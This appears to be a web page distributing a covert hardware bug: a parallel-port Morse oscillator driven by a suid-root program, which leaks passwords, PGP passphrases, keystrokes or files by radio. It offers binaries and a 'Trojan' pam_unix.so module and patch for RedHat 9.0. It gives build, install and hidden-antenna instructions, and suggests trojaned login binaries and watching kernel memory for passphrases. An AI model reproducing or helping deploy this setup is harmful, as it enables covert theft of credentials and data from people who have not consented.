Simple ON/OFF-keyed Morse code oscillator connected to a parallel port to transmit quick data bursts which contain passwords, PGP passphrases or even complete text files. Will require physical access to the computer for the installation of the hardware bug and a small controller program.
- Picture 1 Oscillator mounted in a DB-25 hood "deadbug" style.
The controller software is required to run as root (UID=0) in order to access the computer's hardware port. Either run the program as root or change the program's owner to root and set the SUID bit (chmod 4755 /path/to/bin).
You should edit parport_bug.c to select the particular settings you'll need like parallel port address, Morse code speed and code delay.
- parport_bug.tar.gz (3k gzipped TAR)
- Software Directory Index
- Dynamic Binary - Port 0x378 ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped
- Static Binary - Port 0x378 ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for Linux 2.2.5, statically linked, not stripped
- Trojan pam_unix.so Drop-in PAM module for RedHat 9.0. Installs under /lib/security. Speed set to 50 words per minute
- Trojan patch for pam_unix_auth.c PAM 0.75 (RedHat 9.0)
- Untar the software package. tar xvzf parport_bug.tar.gz
- Go into the parport_bug directory. cd parport_bug
- Edit parport_bug.c and set the #define BASE_ADDRESS to the parallel port you want to use.
- Type make.
- Type make install or install the binary anyway you wish. Make sure the binary is suid-root or run as root.
- To verify the hardware and software work, connect the oscillator to the parallel port of your computer.
- Tune a receiver to 50.00 MHz in CW mode. All-mode, all-band receivers like the AOR AR8000 are the best.
- Type ./parport_bug -m "sos"
- You should hear the Morse code equivalent of "S O S" or three dots, three dashes and then three dots (... --- ...).
- Adjust the -s speed and -d delay options to your liking. Note that some oscillators can not be turned on and off very fast, so use a lower speed setting for those.
- To transmit a text file, use the -f "filename" option.
It is also possible to install the bug internally within a computer by soldering directly to the parallel port and using an unused line in the keyboard or mouse cable as the antenna. This requires that the keyboard or mouse cable not be shielded, or wrapped in a ferrite choke.
Some crystal oscillators have increased current draw as they go higher in frequency. The parallel port is current limited, depending on manufacture, and may not be able to power the oscillator properly. Experiment with different crystal manufactures if it doesn't seem to work right.
Usage can included trojaned login or PAM module binaries to transmit usernames and passwords. You can also watch kernel memory for PGP-style passphrases or even transmit keystokes directly.
Use Baudline to analyze any audio recording you make of the Morse code message.